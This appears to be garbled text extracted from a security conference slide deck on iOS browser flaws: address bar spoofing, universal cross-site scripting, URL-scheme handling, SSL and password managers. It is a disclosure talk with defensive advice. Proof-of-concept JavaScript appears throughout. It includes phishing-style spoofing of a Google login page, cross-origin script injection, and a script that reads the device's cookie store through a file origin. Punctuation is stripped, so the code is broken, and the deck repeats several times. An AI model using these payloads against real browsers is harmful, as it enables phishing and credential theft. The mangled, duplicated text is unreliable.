bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
